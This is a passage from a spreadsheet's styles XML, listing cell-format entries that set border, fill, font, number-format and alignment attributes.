    <xf borderId="9" fillId="13" fontId="45" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="29" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="bottom"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="bottom"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="bottom"/>
    </xf>
    <xf borderId="7" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="9" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="45" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="13" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="13" fontId="55" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="16" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="31" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="33" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="47" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="47" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="47" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="47" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="40" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="41" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="165" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="34" fillId="0" fontId="53" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="28" fillId="0" fontId="53" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="11" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="28" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="26" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="50" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="39" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="35" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="36" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="37" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="39" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="41" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="35" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="32" fillId="0" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="10" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="33" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="28" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="45" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="49" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="46" fillId="13" fontId="49" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="39" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="32" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="49" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="33" fillId="13" fontId="49" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="28" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="13" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="36" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="37" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="47" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="39" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="40" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="47" fillId="0" fontId="49" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="41" fillId="0" fontId="49" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="4" numFmtId="10" xfId="0" applyBorder="1" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="8" fillId="0" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="9" fillId="0" fontId="4" numFmtId="10" xfId="0" applyBorder="1" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="7" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="47" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="13" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="13" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="21" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="13" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="13" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="34" fillId="13" fontId="45" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="34" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="34" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="34" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="13" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="13" fontId="13" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="6" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="34" fillId="0" fontId="53" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="21" fontId="13" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="13" fontId="13" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="1" fillId="13" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="2" fillId="13" fontId="13" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="3" fillId="13" fontId="13" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="2" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="28" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="47" numFmtId="2" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="10" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="11" fillId="13" fontId="13" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
